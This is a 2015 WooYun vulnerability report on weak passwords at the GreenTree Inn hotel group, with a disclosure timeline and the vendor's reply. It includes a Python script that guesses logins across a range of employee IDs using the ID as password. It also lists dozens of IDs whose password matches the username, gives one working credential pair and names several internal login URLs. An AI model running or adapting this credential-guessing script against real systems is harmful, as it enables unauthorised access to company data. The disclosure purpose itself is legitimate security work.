当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137267

漏洞标题:格林豪泰弱口令可登陆多个内部系统(附测试脚本)

相关厂商:格林豪泰酒店管理集团

漏洞作者: 路人甲

提交时间:2015-08-27 10:16

修复时间:2015-10-15 15:18

公开时间:2015-10-15 15:18

漏洞类型:服务弱口令

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-27: 细节已通知厂商并且等待厂商处理中
2015-08-31: 厂商已经确认,细节仅向厂商公开
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开

简要描述:

弱口令
泄漏大量信息
代码渣渣,仅供测试

详细说明:

http://mis.998.com/GreenTreeInn/Login.aspx

选区_242.png


该系统存在大量弱口令
而且多个系统的密码都是一样的
这里仅仅测试密码一致的用户
测试从121700到121999的用户
其中

121725
121748
121766
121769
121770
121782
121792
121793
121794
121810
121811
121818
121822
121840
121845
121850
121851
121853
121861
121873
121898
121907
121909
121913
121917
121935
121937
121938
121942
121944
121955
121956
121959


用户名与密码一致
测试脚本如下

import urllib
import urllib2
import sys
import httplib
reload(sys)

def http_post(mssid):

headers = {'Content-Type': 'text/html; charset=utf-8',
'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0'}
conn = httplib.HTTPConnection('mis.998.com',timeout=60)

conn.request(method='GET',
url='/GreenTreeInn/Login.aspx?__VIEWSTATE=%2FwEPDwUJLTc5ODM1MjU1ZGT30ltSa%2BaePtUM7nljNu8o%2B6C%2B%2BnSemxsTdnigxZ917A%3D%3D&Button1=&__VIEWSTATEGENERATOR=D163A9F1&__EVENTVALIDATION=%2FwEdAATt7vpG6L5elJ6XYvxzyyJxwFzS9Q9XYLeSu6PO5aruGM34O%2FGfAV4V4n0wgFZHr3fWF4n%2F0eHNkrycm50r%2BqLZUgUG6wYq6sEpWbM867W%2BzAXrCND7Dl0vpAgSNMVLcTc%3D&txt_uname='+mssid+'&txt_upwd='+mssid,
headers = headers)

resp = conn.getresponse()
html_doc = resp.read()
conn.close()
if resp.getheader("set-cookie").count(mssid+'@998.com') >0:
print mssid
#print resp.getheader("set-cookie")
#print type(resp.msg)
#print resp.msg.getplist()
#return html_doc
for i in range(121700,121999):
sys.setdefaultencoding('utf-8')
http_post(str(i))


参考 WooYun: 格林豪泰弱口令可登陆多个系统,且可以SQL注入
同一个用户可以登录

http://101.227.68.206/Home/logIn?ReturnUrl=%2F
http://mis.998.com:5655/Home/Logon
http://mis.998.com/GreenTreeInn/Login.aspx
http://101.227.68.208/Login.aspx
http://oa.998.com
http://erp.998.com
http://bill.998.com/login;jsessionid=126414A1ED950FE55FAC7C13B7F93F47


这些应用

漏洞证明:

这里取一例
用户名121937 密码121937
mis系统http://mis.998.com/

选区_243.png


选区_244.png


报表系统http://101.227.68.208/Login.aspx

选区_245.png


选区_246.png


预算系统http://mis.998.com:5655/Home/Logon

选区_247.png


选区_248.png


选区_249.png


oa系统 http://oa.998.com/main.jsp
(这个系统加了验证码,但是验证码好像形同虚设。还是可以进行爆破)

选区_250.png


选区_251.png


联系人信息

选区_252.png


选区_253.png


CRS系统 http://101.227.68.206/home/logon?ReturnUrl=%2f

选区_254.png


选区_255.png


选区_256.png


选区_257.png


新业务平台http://erp.998.com/

选区_258.png


选区_259.png


应收系统 http://bill.998.com/login;jsessionid=46678D0EEBB695C37C95D79A2D474C32

选区_260.png


选区_261.png


各种信息

选区_262.png


选区_263.png


选区_264.png


其他就不查看
sql注入未测试

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-08-31 15:17

厂商回复:

感谢对格林的关注,已处理。

最新状态:

暂无